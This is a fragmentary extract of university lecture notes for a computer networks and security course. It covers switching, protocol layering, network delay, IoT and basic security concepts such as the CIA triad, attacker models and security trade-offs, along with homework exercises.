Lecture Notes PDF
Lecture Notes PDF
Important Notice:
Students can take their own notes, for example, on lecture slide set PDF
documents (available on the course website before each lecture). This document
and references in it marked as required reading (provided at the end of each
chapter) form a supplement to the lectures. They are meant to give more detail
and fill the gaps. In the exam, you are responsible for the lecture content, the
lecture notes (this document) and the required reading. Lecture slides will often
only contain illustrations of main ideas. Further explanation is provided during
the lecture, in the lecture notes and in required reading.
Each chapter of this document provides a literature section that describes
required reading and suggested reading. The required reading is part of the
exam material while the suggested reading is not. The suggested reading is
for students who are interested in background information and/or a different
perspective on or presentation of the material that is useful to help get a bet-
ter/deeper understanding of the material. Additional references to related work
may be given inside the text. These provide related materials and/or more in-
depth discussions. Interested students can learn more reading these; but they
are considered to be outside the scope of assessment.
This is the first iteration of these notes; some flaws will be present and
improvement suggestions are welcome. Please report textual mistakes that you
come across to the e-mail address [email protected] and help us improve the
quality.
End of notice.
About this document
This document is meant as supporting material for the lectures in the Computer
Networks and Security (2IC60) course and the referenced reading materials. It
is not meant to be a stand alone document. This document is still work-in-
progress.
Thanks
The course material covered in these notes has been developed with contribu-
tions from Elisa Costante, Ricardo Corin, Jeroen Doumen, Sandro Etalle, Pieter
Hartel, Boris Skoric, Nicola Zannone, Igor Radovanovic and Johan Lukkien.
The authors would also like to acknowledge the sources of some of the figures
and exercises in this document:
3
Contents
1 Introduction 7
1.1 Networks and Computer Networks . . . . . . . . . . . . . . . . . 7
1.1.1 Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.1.2 Computer Networks . . . . . . . . . . . . . . . . . . . . . 8
1.2 Push Behind Networks . . . . . . . . . . . . . . . . . . . . . . . . 9
1.2.1 Technological Development . . . . . . . . . . . . . . . . . 9
1.2.2 Industrial Development . . . . . . . . . . . . . . . . . . . 11
1.2.3 Economic and Social Aspects . . . . . . . . . . . . . . . . 12
1.3 Standards and Regulations on Networks . . . . . . . . . . . . . . 13
1.4 Network Physical Infrastructure . . . . . . . . . . . . . . . . . . . 14
1.4.1 End Devices and Access Networks . . . . . . . . . . . . . 16
1.4.2 Network Core . . . . . . . . . . . . . . . . . . . . . . . . . 19
1.5 The Internet: Today . . . . . . . . . . . . . . . . . . . . . . . . . 21
1.6 Internet of Things (IoT): Tomorrow . . . . . . . . . . . . . . . . 22
1.7 Network Security . . . . . . . . . . . . . . . . . . . . . . . . . . 24
1.7.1 Security and Network Security Goals . . . . . . . . . . . . 25
1.7.2 Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
1.7.3 Security Engineering . . . . . . . . . . . . . . . . . . . . . 27
1.8 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
1.8.1 Literature . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
1.9 Homework Exercises . . . . . . . . . . . . . . . . . . . . . . . . . 32
3 Application Layer 46
3.1 Application Layer Protocol: What is it and what is it not? . . . 46
3.2 Issues Solved by the Application Layer . . . . . . . . . . . . . . . 48
3.2.1 Application Architecture Styles . . . . . . . . . . . . . . . 49
4
CONTENTS 5
4 Transport Layer 67
4.1 Issues Solved by the Transport Layer . . . . . . . . . . . . . . . . 68
4.2 Addressing Processes and Packetization . . . . . . . . . . . . . . 69
4.3 Connection and Connection-less Service . . . . . . . . . . . . . . 70
4.4 Internet’s Layer 4 Protocols: UDP and TCP . . . . . . . . . . . . 72
4.4.1 UDP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
4.4.2 TCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
4.5 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
4.5.1 Literature . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
4.6 Homework Exercises . . . . . . . . . . . . . . . . . . . . . . . . . 82
5 Network Layer 84
5.1 Internetworking . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
5.2 Datagram Networks . . . . . . . . . . . . . . . . . . . . . . . . . 86
5.2.1 Packetization . . . . . . . . . . . . . . . . . . . . . . . . . 86
5.3 Layer 3 Addressing and Subnetting . . . . . . . . . . . . . . . . . 90
5.4 Network Layer Routing . . . . . . . . . . . . . . . . . . . . . . . 93
5.5 Network Layer Connections: Virtual Circuits . . . . . . . . . . . 96
5.6 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
5.6.1 Literature . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
5.7 Homework Exercises . . . . . . . . . . . . . . . . . . . . . . . . . 97
9 Cryptography 158
9.1 Basics and Security Goals of Cryptography . . . . . . . . . . . . 158
9.2 Symmetric Cryptography . . . . . . . . . . . . . . . . . . . . . . 160
9.3 Public Key Cryptography . . . . . . . . . . . . . . . . . . . . . . 165
9.4 Block modes: Encrypting more than one block . . . . . . . . . . 167
9.5 Example Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . 169
9.5.1 Data Encryption Standard (DES) . . . . . . . . . . . . . 169
9.5.2 Advanced Encryption Standard (AES) . . . . . . . . . . . 170
9.5.3 RSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
9.6 Computational Security . . . . . . . . . . . . . . . . . . . . . . . 173
9.7 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
9.7.1 Literature . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
9.8 Exercises (not graded: exam preparation) . . . . . . . . . . . . . 176
Introduction
Document structure
• Chapter 1 provides a general introduction to the concepts of computer
networks and (network) security.
• Chapter 2 explains how protocols govern computer networks and gives
an overview of protocol layering and protocol stacks.
• Chapter 3 introduces application layer concepts and the principles of
networked applications.
• Chapter 4 introduces transport layer services and widely used transport
layer protocols of the Internet.
• Chapter 5 gives an overview of network layer services for end device to
end device data delivery.
• Chapter 6 introduces the data link layer whose task is to transfer data
over a single (wired or wireless) link.
• Chapter 7 discusses key security issues at the network edge; authorization
(what resources can be used at the server side) and authentication (who
is present on the client side).
• Chapter 8 focuses more on the security aspects regarding network core
by looking at threats and corresponding countermeasures at the different
network layers.
• Chapter 9 discusses in detail an essential tool for network security: cryp-
tography.
• Chapter 10 explains how we can analyze the security properties of pro-
tocols.
7
8 CHAPTER 1. INTRODUCTION
Figure 1.2: To this day, the number of transistors that fit in an integrated circuit
follows Moore’s law closely. (Figure source: intel.com)
1.2. PUSH BEHIND NETWORKS 11
Figure 1.3: The number of devices connected to the Internet and their types
across years, with a projection until 2018. (Figure source: Cisco)
Moore’s law has an important result. It implies that devices that are just
not capable enough to connect to the Internet due to lack of computational
power will be powerful enough soon. A recent report by Cisco indicates that
we are rapidly moving from the Internet of personal computers to an Internet
of smart phones, tablets and machine-to-machine (M2M) communications. All
projections are towards a future of the Internet that is dominated by data traffic
that does not involve any humans. Figure 1.3 by Cisco shows the profiles of the
devices connected to the Internet with projection until 2018.
1 Gordon E. Moore, “Cramming more components onto integrated circuits”, April 1965.
12 CHAPTER 1. INTRODUCTION
Figure 1.4: The total reach of the Internet technology is increasing rapidly, in
parallel with the industry that is associated with it. (Figure source: ITU)
2015/
3 Coursera is an Internet platform for massive open online courses. It hosts over a thousand
courses from many universities and serves students all around the world.
1.3. STANDARDS AND REGULATIONS ON NETWORKS 13
Figure 1.6: Worldwide B2C e-commerce sales volumes. The years marked with
a * are projections based on previous data. (Figure source: statista.com)
often does not result in user acceptance. For example, Wireless Application
Protocol (WAP) was advertised with the words “Internet made mobile”, when in
fact it was just a new protocol that did not really have a big impact either socially
or economically. The Multimedia Messaging Service (MMS) was advertised as
a better replacement for Short Message Service (SMS), but it never could really
replace or even come close to SMS. Multimedia integration into text messages
became huge only after services like Whatsapp, for which the convenience factor
is substantial.
like Finland, citizens legally have a right to broadband Internet. That is, in
these developed countries, high speed access to the Internet is a civil right, just
like getting education and health care. Given this significant penetration into
societies, in every country (some more strict than others), the government wants
to regulate the use and the utilization of the Internet. In doing so, their goals
are many. Government regulations can be, for example, for the sake of:
Figure 1.8: The network infrastructure consisting of end devices, access networks
and network core. (Figure by Kurose and Ross)
16 CHAPTER 1. INTRODUCTION
Figure 1.9: Smart spaces are advanced computer networks where the user is in
the center of all, i.e. smart space applications are there to satisfy the user. Many
applications with various characteristics can be realized by devices that surround
the user. These can be provided by individual devices or collaboratively.
(private) network protocols dedicated for this purpose. Simple data re-
trieval (sensing, diagnostics) is possible. Software updates over the net-
work are possible, but typically not straight-forward (expert knowledge is
needed).
• Network-connected embedded systems are ‘on-line’ using standard
protocols that are open to the public. Networks of these typically go by the
name “machine-to-machine networks”. An example is a body sensor node
that monitors posture of a person, warns when the posture is not right and
stores the data on a remote server for the access of the physiotherapist.
• Network-central embedded systems have some standalone function
but the design of both hardware and software aim at operation in a net-
worked context. Examples are with many smart phone apps, television
sets and intelligent lighting (e.g. Philips Hue).
• Fully networked embedded systems do not have a meaningful stan-
dalone function when they are disconnected from the network. These are
mostly cheap devices with elementary behavior. Very low resource devices
are typically fully networked. Examples are with applications of simple
sensing and actuating and elementary computing.
In general, devices can be classified (as of today) as shown in Figure 1.11,
where each row corresponds to a different device class.
DSL gives dedicated connection to the central office (the gateway to the
Internet core) and, therefore, provides dedicated access bandwidth to its indi-
vidual customers. On the other hand, cable Internet connection is shared among
neighbors, i.e. more than one household hook up to the cable line, resulting in
bandwidth sharing. Although outside of peak hours cable Internet is typically
faster than DSL, the effective bandwidth per household is likely to drop for
cable Internet during peak hours when a lot of people are online.
Figure 1.12: The sea of routers forming the network core (Figure by Kurose &
Ross).
Figure 1.13: Resources allocated to four different senders (color coded) in FDM,
TDM and a combination of FDM with TDM.
they pause between sentences and while listening to the other party. Resource
reservation is typically done (by means of a call setup procedure) considering
the maximum amount of resources needed at any given instance during a ses-
sion. This in combination with not sharing resources brings the disadvantage
that the resources that are not used by the current session remain idle, which
is a waste.
By dividing the network resources among sessions, what circuit switching
does is indeed dividing the network into logical pieces, each of which is accessible
to only one session. But how can we divide a link (e.g. a wire) into logical pieces?
This can be done, for example, using Frequency Division Multiplexing (FDM),
Time Division Multiplexing (TDM), Code Division Multiplexing (CDM) or a
combination of these.
In FDM, a different frequency subband is allocated to every session. Part
of the allocated frequency band is used for receiving (downlink) while the re-
maining part is used for sending (uplink). In TDM, a different time slice of a
(fixed) time period is allocated to every session. Resources allocated to different
senders in FDM, TDM and a combination of FDM with TDM is visualized in
Figure 1.13.
In CDM, every session uses a signal code which is orthogonal to all the
other codes that are used by other transmitters, such that the multiplication
by the session’s own code will return zero for all transmissions except for the
transmissions of this specific session.
Figure 1.15: Store and forward behavior example with 2 routers between the
sender and the receiver. (Figure by Kurose and Ross)
must arrive at the router before it can be transmitted on the next link. It takes
L/R seconds to transmit (push out) packet of size L bits onto a link at a rate of
R bps (bits per second). For the example given in Figure 1.15, the transmission
delay experienced by the packet is 3L/R seconds (i.e. L/R for the transmission
from the source, and 2L/R for the transmissions from the routers).
Packet switching allows more users to use the network at the same time, i.e.
there is no call admission process. This comes at the expense of losing quality
guarantees (see the exercise at the end of the chapter).
As given by the taxonomy of Figure 1.7, it is also possible to realize virtual
circuits using packet switching. The term ‘virtual’ implies that even though the
connection is packet switched (i.e. each packet uses entire channel resources),
the multiplexing of packets can be done in such a way to provide circuit-like
guarantees for selected sessions. We will come back to this topic later.
Figure 1.16: The number of “things” that are connected to the Internet will
be 50 billion by year 2020 according Cisco Internet Business Solutions Group
(IBSG) report. (Figure by Cisco)
Just try to think of a world without the Internet. In today’s world, this is
almost unimaginable. Vital services of the government and the business sector
depend on the Internet. Not to mention that most people would be very upset
by its absence, since being “always on(line)” is nowadays crucial to many people.
• very small packet size: an IP packet may not be delivered in one go.
Physically The IoT is the Internet plus an extension of the Internet into
the physical world surrounding us, which is monitored and affected by things:
constrained devices with limited memory, processing power, energy and acces-
sibility. Things are connected through Internet-enabled constrained networks
(deriving from device constraints) but then united with fast networks and regu-
lar Internet services.
24 CHAPTER 1. INTRODUCTION
Figure 1.18: The C-I-A triad and security attributes in a network context.
Logically The IoT stands for the vision of the Internet of tomorrow. It is
a global facility that extends the reach of distributed applications to billions
of resource-poor devices. The IoT brings endless possibilities for innovative
scenarios (e.g. smart homes, smart health care, smart buildings, smart cities),
characterized by the fact that distributed IoT applications consist of collaborat-
ing services running on many distinct devices.
2008
Nik Scott
Figure 1.19: Two views on privacy on the internet
ferent from integrity in that it focuses on data coming from the ‘correct’ source
rather than on data not being changed along the way. A signature on a contract
would be an example of a way to achieve non-repudiation; you cannot later deny
agreeing to the conditions in the contract. The relation between accountability
and non-repudiation is similar to that between integrity and authenticity; non-
repudiation can be an important part of achieving accountability but is by itself
not sufficient.
The security requirements together with the security policies of a system
tell you what attributes should be achieved when (in which context). The
requirements will typically say what security attributes should be achieved by
which components and/or for what type of resources (e.g. confidential database
entries should only be readable by user with the right clearance). Security
policies detail this e.g. by stating what type of data is confidential and what
(types of) users have clearance. Security requirements are an integral part of
the design of the system while changes of policies is typically taken into account
and should not invalidate the design. Note, however, that the term security
policy is widely used and the exact interpretation varies. It could be a high
level textual description meant to be understood and applied by human beings,
e.g. “all personal identifiable information must only be read when needed to
provide a service” to low level computer readable information e.g. “drwxr-xr-
x”5 . Translating high level policies into a systems design along with low level
policies is an important step of creating a secure system.
The exact meaning of a security policy can be given within a security model; a
(formal) framework to express and interpret policies. For example, the Unix file
permission given above can be interpreted as a relation between Users, Groups,
Objects and Permissions: An object (e.g. a directory) has an owner user and
a group (an additional part of the security policy) and the owner of the object
has read, write and execute permission, while members of the group as well as
other users have only read and execute permission.
1.7.2 Threats
The security attributes of the system may be at risk from several types of threats.
Besides the usual problem such as program errors and system failures, security
also needs to address malicious entities, which are specifically trying to break the
system. This is very challenging; every day seems to bring new security incidents
where attackers are able to exploit (previously unknown) security weaknesses.
Although this may give a skewed perspective (a system remaining secure yet
another day will not make the news), it does show the importance of applying
the right mechanisms for securing your system.
To decide what the right mechanisms are to achieve the security requirements
of the system, we need to know whom we want to protect against. Protecting
information in a database from an outsider requires different solutions than
protecting it from the database administrator. We thus need an attacker model.
This attacker model captures the capabilities and possibly the intentions of
an attacker. For example, in a network setting we may distinguish between
attackers that can only listen in (eavesdrop) and those that can block and/or
modify communication.
5A Unix-style file “read-write-execute” permission setting.
1.7. NETWORK SECURITY 27
Design There is no hope of having a secure system if the system design does
not address security goals or worse has inherent features/goals that imply
security problems. As an example consider the Windows Meta File (WMF)
where arbitrary code execution, a clear security risk, is a design feature.
As another example one can consider the Internet; initially the Internet
linked a group of trusted systems. Security goals that are very important
now were thus not under consideration in its design, e.g. no protection of
content, any computer can claim to have an IP, no authentication of DNS,
etc. Of course there are currently security mechanisms (IPsec, HTTPS,
etc.) that try to remedy this but ‘add on security’ is always problematic -
security needs to be considered from the start.
Security Tool Selection Choose your crypto well, especially if you are a
mafia boss. From a news article: “...He apparently wrote notes to his
henchmen using a modified form of the Caesar Cipher, which was easily
cracked by the police and resulted in further arrests of collaborators...”
Clearly here the selected security tool was grossly insufficient to reach the
security goal.
28 CHAPTER 1. INTRODUCTION
Of course these are only examples and there are many more aspects of a
system where a weak link in the security chain may occur. The key points are
that one needs to consider the system as a whole and consider security from the
start.
We have already seen some security tools (means) above and later we will try
to add key tools to this toolbox, focusing on network scenarios. Cryptography
is an important part of this toolbox. However recall that security tools by
themselves do not make the system secure. A common claim ‘the data is secure
because it is encrypted’ is by itself meaningless and may even indicate that
the security goals and the attacker model have not been sufficiently considered.
For instance, encryption offers no protection against inside attackers who have
access to the key. A good security design determines what security tools need
to be employed where and when, considering the security requirements and the
effects (including trade-offs) different tools have on these requirements.
Trade-offs
“The only truly secure system is one that is powered off, cast in a
block of concrete and sealed in a lead-lined room with armed guards.”
E. Spafford
Such a system may be secure but not very useful. (Actually it may not be
secure at all - Which security attribute is clearly not satisfied? - without the
security goals we cannot answer this question...) There is often a clear trade-off
between security and usability (why do I need to remember that password...),
performance (e.g. using encryption adds computation time) and costs (e.g. re-
placing pin cards and readers by smart card enabled versions). There is also a
trade-off between different security attributes e.g. confidentiality and availabil-
ity. We have to be able to answer the question: Which trade-offs are worthwhile;
e.g. how much security do we gain for the performance we give up?
30 CHAPTER 1. INTRODUCTION
Why does security often not get the attention it needs? For one; if it’s
good you do not see it. Would you pay 50 Euro more for a television if it
was more secure? Does your answer depend on ‘how much’ more secure? It is
also hard to quantify security. You can say that a ‘product is 2 times faster’
and convince every consumer with some notion of why and how much better
the product is, even though this statement is usually much more complex than
it seems. However, what does ‘this product is 2 times more secure’ mean?
There are many discussions on which product is more secure, e.g. comparisons
between Windows and Linux, Firefox and Windows Explorer, Mac and PC, etc.
Claims are supported by quoting the number of bugs/vulnerabilities reported,
the number of security incidents, etc. But how well do any of these really reflect
the overall ‘security’ of a system. Thinking back to the earlier discussion about
what is ‘security of a system’ one can see that no single number could really
adequately capture this. Still, what quantification is possible? If we try to focus
our attention on a single aspect of security and a single application area, one
may be able to give some numbers that make sense (just remember that, the
more general the statement the less objective a score is likely to be).
For cryptographic primitives one can look at the (computational) cost of
breaking a system. This is often expressed by the entropy that it offers in a
given setting, e.g. ‘this crypto system offers 80-bits of security’ reflects that
the amount of computation needed to break it is similar to brute-forcing an 80
bits key, i.e. trying 280 different possibilities. This is generalized to a measure
for security of systems by considering the cost (computational or otherwise) of
breaking the system’s security; e.g. it would take 2 years and a budget of 10
million euros to break this system (i.e. violate a specific security goal of the
system).
For web applications several security metrics have been defined by checking
for common security issues and assigning a risk to each of them. For example,
the CCWAPSS common criteria for web application security scoring [8] com-
putes a score based on a list of eleven criteria. Each criteria has to be checked
(rating the web service on a scale from 1 to 3 for each item) and assigned a risk
level based on the difficulty and impact of an attack.
Their interest and goals thus have to be considered (though not necessarily
completely reached - we may need to make trade-offs between the different
goals of the participants).
The stakeholders and their interests become the initial actors and goals in
the requirements gathering process. If an agent has the right capabilities,
it may adopt a goal, i.e. take responsibility to achieve it. If an agent does
not adopt the goal it may be delegated to other agents (either existing
or new) or be split into new sub goals. Agents do not work in isolation;
agents and their goals may depend on/interact with each other. These
dependencies should be identified and could lead to new goals and/or
agents. They also lead to potential vulnerabilities, e.g. when agents’ goals
conflict.
So far the process matches a typical functional requirement engineering
approach. In order to deal with security requirements we also need to
consider attackers and possible attacks on the system.
1.8 Summary
The goal of this chapter was to introduce the most basic and fundamental con-
cepts of computer networks and network security, as well as the motivations
for their existence. You now know the principle nuts and bolts of a computer
network, the idea behind network protocols and protocol layering. A simple
overview of the Internet and the Internet protocol stack have been provided in
our discussion, together with an outlook into the future of the Internet domi-
nated by machine-to-machine communication, i.e. the Internet of Things. After
our security discussion, you will never look at the word ‘secure’ in the same
way again: Whenever you encounter ‘secure’ always think - what set of security
requirements (which security attributes for which resources) are really meant
by ‘secure’ (what are the security policy and model) and what type of attacker
is considered (what is the attacker model). The notions introduced here will
return in more detail in the chapters that follow.
32 CHAPTER 1. INTRODUCTION
1.8.1 Literature
Other required reading
• Article titled “A goal oriented approach for modeling and analyzing secu-
rity trade-offs” [15].
– http://www.cs.utoronto.ca/~gelahi/GEER-ER07.pdf
– https://dl.packetstormsecurity.net/papers/web/ccwapss_1.1.pdf
Suggested reading
• The pharmacy sends you your prescription at home but also starts
sending you advertisements for products.
• Your medicine is lost in the mail.
5. Consider again the prescription for medicine from your GP that is filled
by a pharmacy sending the medicine to your home mentioned in the re-
view questions. Create a (textual) security policy for this scenario which
describes which security properties(attributes) must be satisfied when. In-
dicate the involved security attributes for different statements in your
policy.
6. An online music store allows its members to listen to music with embedded
ads for free and to download music without ads for a fee. Members can
also recommend songs to other members and get a free ringtone if at
least five people listen to a song based on this recommendation. Do the
first steps in a basic ‘security requirements engineering’ for this scenario:
identify actors, their interests and interdependencies. Also find attackers
and their goals. (As we discuss security tools in later chapters, you can
enhance this design by extending it with potential countermeasures.)
7. Find a security related news article and analyze it (collect some back-
ground information when needed).
2. Whenever you come across existing trails that are stronger, join them.
3. Once you find food, follow the pheromone trail back to the nest.
Figure 2.1 shows a typical purchase protocol defining the way we buy food
at the cafeteria. An important observation is that the cashier starts serving
the user only after the user has waited for her turn in the queue. Some sort of
greeting (“Hello” in this example message flow diagram) starts their interaction
and another greeting (“Bye” in this example) ends their interaction. After this
point the cashier can start serving the next customer.
Note that the figure shows only the “relevant” interactions and skips details
such as “the customer takes out her wallet”. In general, the description of
a protocol should be as detailed as needed. Details that do not matter are
skipped. For example, a certain customer may not carry a wallet and just keep
34
2.2. PROTOCOL LAYERING 35
the money in his pocket. Protocols are detailed further until all ambiguities
regarding the operation are completely removed.
As another example; there is social protocol in every culture. In the Nether-
lands, during a conversation, one has to wait until the other person stops speak-
ing. Interrupting others when they are speaking is perceived as rude behavior.
Likewise, one who is speaking should give others the opportunity to respond.
This is how you can get a conversation going. Looking at your mobile phone
while someone is talking to you is impolite.
Figure 2.2: Protocol layering: Layers above use the services of the layers below.
Large networks like the global Internet have to deal with the complexity at
the corresponding large scale. For example, a message created by an electric car
about its usage patterns while it is on the move should be able to find its way
to a database implemented in a large server rack of the car company somewhere
across the globe.
A protocol layer refers to a group of related functions that are performed
in a given level in a hierarchy (of groups of related functions). Protocol layer-
ing divides complex network protocols into simple network protocols. Protocol
layers above make use of the functions of the layers below as depicted in Fig-
ure 2.2. A set of horizontal protocols together with the interactions between
the different layers define a layered protocol stack.
As an analogy, consider the following list of horizontal protocols that govern
a restaurant environment and the way of operation there.
Note that the table set-up protocol needs the services of the table cleaning
protocol (tables are first cleaned and then set up). Similarly, the seat manage-
ment protocol needs the services of the table set-up protocol (table needs to be
set-up before it can be given to customers). One thing to notice here is that each
of these individual protocols can be modified independently, without affecting
2.3. NETWORK PROTOCOL STACKS 37
the other protocols. For example, the cleaning personnel can change and they
can do cleaning differently. However, this changes nothing in the table set-up
protocol. The corresponding protocol stack is shown in Figure 2.3.
It is also possible to make a vertical (monolithic) protocol design without
using protocol layering; i.e. a single protocol that governs communication. In
vertical protocol design, each new application has to be re-implemented per
device type, per operating system, per access link technology.
While dealing with complexity, layering brings overhead, i.e. the perfor-
mance of a layered protocol stack is sub-optimal (extra headers, extra process-
ing, etc.). For that reason, for applications with simple communication, where
resource management and optimization is the main concern and where there is
a dedicated (embedded) hardware platform, a vertical design may be preferable.
For example, consider sending a robot to Mars. The software of the robot has
to be optimized such that a lot of functionality can fit in a small volume and
weight. In the past vertical protocol design for embedded wireless sensor devices
was the common practice due to severe lack of resources. It is not anymore since
current devices in classes D1 and above are able to manage lightweight Internet
protocol stacks.
Horizontal protocol design and protocol layering are our choices when sim-
plicity and convenience are the main concerns instead of resource optimization.
Internet would not have been possible without protocol layering.
Figure 2.4: Network protocol stacks allow convergence from a large set of phys-
ical layers to protocols and divergence from protocols towards a huge set of
applications. (Figure by Johan Lukkien).
networks and others will look possibly more complex and detailed. The “good”
news is, we will not go into very complex protocols in this course. However,
the fundamental knowledge that you acquire in the course should enable you to
study any protocol stack and understand it easily.
(4) Transport Layer: The transport layer (layer 4) is responsible for trans-
port of application layer messages between (remote) processes. The transport
layer protocol must keep track of application data from several processes and
package those in transport layer packets called segments with certain labeling.
It relies on the network layer (layer 3) for delivery of segments between the
end-devices containing the processes. The receiver side of the transport layer
protocol delivers the messages within those segments to the corresponding re-
ceiver processes using the segment labeling. In addition to process-to-process
delivery, transport layer services also include reliable data transfer, flow control
(match speed between sender and receiver), and congestion control (keep the
network load below capacity).
(3) Network Layer: The network layer (layer 3) is responsible for end-to-end
packet delivery between two devices (from the original source to a destination)
that are attached to different (sub)networks. A network layer packet is called
a datagram and contains a transport layer segment as its payload. Other
important services of the network layer are logical addressing, routing, error
handling and quality of service control. In their end-to-end path from source
to destination, datagrams pass through many routers and links between routers.
The network layer relies on the services of the link layer (layer 2) for delivery
on a single link, e.g. between two consecutive routers.
(2) Data Link Layer: A link layer (layer 2) packet is called a frame. It
contains a network layer datagram, which it carries to the next node (either a
router or the destination host) on the end-to-end route. Link layer services also
include physical addressing, medium access control (MAC), link flow control
and error handling. A link can be wired or wireless. The set of all devices
interconnected via the link layer is is called a network or a subnet.
(1) Physical Layer: The physical layer (layer 1) operates on individual bits
and it is responsible for moving bits (actually, electrical, optical, magnetic or
radio signals representing bits) from one node to the next. The original design
of the TCP/IP protocol suite did not have this layer and it was added later.
40 CHAPTER 2. NETWORK PROTOCOLS AND PROTOCOL LAYERS
Because of the last principle, the OSI design and the Internet design bear
a lot of similarities. In fact, the five layers of the Internet protocol stack are
equivalent to the layers 1, 2, 3, 4 and 7 of the OSI protocol stack.
Presentation Layer: Sometimes the data sent from the source needs to be
translated into a different format for the destination to understand. The presen-
tation layer deals with the differences in data representations of the communi-
cating entities in terms of syntax. It translates different character sets of hosts
using different operating systems to each other, e.g. convert a text file that is
ASCII-coded to its EBCDIC-coded version. Compression and decompression of
2.4. SERVICES OF A PROTOCOL LAYER 41
Figure 2.7: Example protocol stacks in relation to the OSI model. (Figure by
Radovanovic)
data can be implemented in this layer. Some encryption and decryption pro-
tocols can also be implemented, e.g. the Secure Sockets Layer (SSL) protocol.
Many network protocol stacks lack this layer since the associated functions are
often not needed and they can be implemented in the other layers.
Session Layer: The role of the session layer is to establish, maintain and close
communication sessions, i.e. a persistent connection and the corresponding data
exchange between two remote processes. An example of a session is a voice call
session.
Figure 2.7 gives an overview and examples of different instantiations of the
OSI model by different parties.
Note that services are not the same as protocols. A service defines
what operations can be performed but it says nothing about how these opera-
tions are performed. A service interface between different layers defines how
to access the services of the lower layer. A protocol, on the other hand, de-
termines how exactly the service is implemented and defines a set of rules and
packet formats for this purpose.
Data encapsulation is a typical service of a protocol layer. Every protocol
layer (except layer 1 which only deals with bits and not data units) implements
data encapsulation as one protocol layer’s data is payload for the layer below it.
42 CHAPTER 2. NETWORK PROTOCOLS AND PROTOCOL LAYERS
Every protocol layer deals with its own type of packet, and its own protocols,
without depending on the other layers. Figure 2.9 shows data encapsulation in
the Internet.
As mentioned earlier, in the Internet terminology:
Nodal Processing Delay: Routers spend some time doing some simple pro-
cessing for every packet that they receive in one of their network interfaces.
Such processing includes, for example, check for bit errors inside the packet
2.5. PERFORMANCE: NETWORK DELAY, PACKET LOSS AND THROUGHPUT43
Queuing Delay: After the nodal processing has been completed, the packet
still has to wait in line in a packet queue at the selected outgoing link of
the router for being transmitted. This is because packets are transmitted
one by one by the routers at each of their outgoing links. The queuing
delay depends on the network packet traffic. If there is congestion in the
network, then the queuing delay becomes by far the dominating factor in
the overall delay.
Transmission Delay: The store and forward behavior means that packets
must experience a transmission delay at each router, i.e. time needed
for fully transmitting all bits of the packet. This happens at each router
(and on each link) that they pass through. The transmission time de-
pends on the link throughput2 of the link and varies across links as we
discussed earlier. If the outgoing link throughput is R bps and the packet
length is L bits, then the time it takes to send L bits into the link is equal
to L/R seconds. Transmission delay can be significant for slow links.
Propagation Delay: It takes time for a single bit (or the signal symbol rep-
resenting the bit) to take the distance across a wire (or wireless medium).
Depending on the transmission medium, the propagation speed of bits is
close to the speed of light. However, even at this speed, the propagation
delay on very long links (e.g. intercontinental or satellite links) becomes
noticeable. This delay (on a single link) is equal to the distance divided
by the propagation speed. The propagation delay can vary from a few
microseconds to hundreds of milliseconds in practice.
The total nodal delay is equal to the sum of the nodal processing delay, the
queuing delay of the node, the transmission delay onto the next link and the
propagation delay experienced on that link.
The end-to-end network packet delay is equal to the sum of all four delay
components for all nodes passed through before reaching the destination.
Data packet loss occurs if a packet arrives to a full queue at a router. In this
case, one of the packets in the router’s queue (e.g. the newly arriving packet)
has to be discarded. This is the reason for losing a lot of packets during network
congestion.
If the total delay between the source and the destination is somehow too
high, this may also cause situations which effectively translate to data loss. For
example, a video frame which passed its playback time during a video session
is not useful and cannot be used, i.e. there is no way to fix the past.3
2 The rate (bits per second) at which bits are transferred onto a link.
3 On the other hand, such data can still be used by some modern video codecs to increase
the quality of future video frames.
44 CHAPTER 2. NETWORK PROTOCOLS AND PROTOCOL LAYERS
Throughput gives the rate (bits/second) at which the bits that are pumped
into the network by the sender side reach the destination (after some delay, of
course). For a good user experience, an application that requires processing of
R bits every second (for example, consider streaming of a video that uses R bits
to encode every second of footage) needs a network throughput of roughly R
bits per second. There is a simple reason for this: the video player needs to
consume R bits every second (convert those bits into video frames), which it can
only receive through the network. When the network throughput is consistently
lower than this minimum requirement R the video at the receiver will inevitably
freeze since the receiving device is not getting the bits fast enough to consume
them in a timely manner. This is what you experience when your smart phone
switches from 4G to 3G while you are watching a high-definition YouTube video.
2.6 Summary
The goal of this chapter was to give the motivation for protocol layering and
introduce it as a general network concept. We have explained how this concept
applies to the well-known OSI reference model and to the Internet model. You
should now be able to study layered protocol stacks and understand the ser-
vice model provided by each layer. Layering is not optimal performance-wise.
However, the gain from reduced complexity and increased flexibility (modular
design) is so high that protocol layering is widely used in computer networks.
Nevertheless, we also have to acknowledge the existence and the use of verti-
cal protocols in practice as well. A vertical protocol is a single protocol that
governs the operation of everything all the way from hardware function to appli-
cation function. Although this typically results in better performance, it makes
maintenance, management and interoperability very tough (e.g. new hardware
requires changes to the protocol). We also discussed the concepts of network
delay, packet loss and throughput.
2.6.1 Literature
Suggested reading
• Chapter 1 of the book Computer Networking: A Top-Down Approach by
Kurose and Ross [20, Chapter 1].
3. Consider the queuing delay in a router buffer with infinite size. Assume
that each packet consists of L bits. Let R denote the rate at which packets
are pushed out of the queue (bits/sec). Suppose that the packets arrive
periodically every L/R seconds. What is the average router queuing delay?
4. How does the average transmission delay affect the average queuing delay?
Consider busy routers with a lot of traffic and explain. (Not asking for a
mathematical relation.)
5. Make a reasonable discussion of how the different delay types contribute
to the end-to-end packet delay in the following cases, i.e. indicate which
delay types are likely to have the most influence on each scenario and why.
• A session between two hosts in Canada and Belgium, outside of peak
hours.
• A session between two hosts in Canada and Belgium, during peak
hours (congestion).
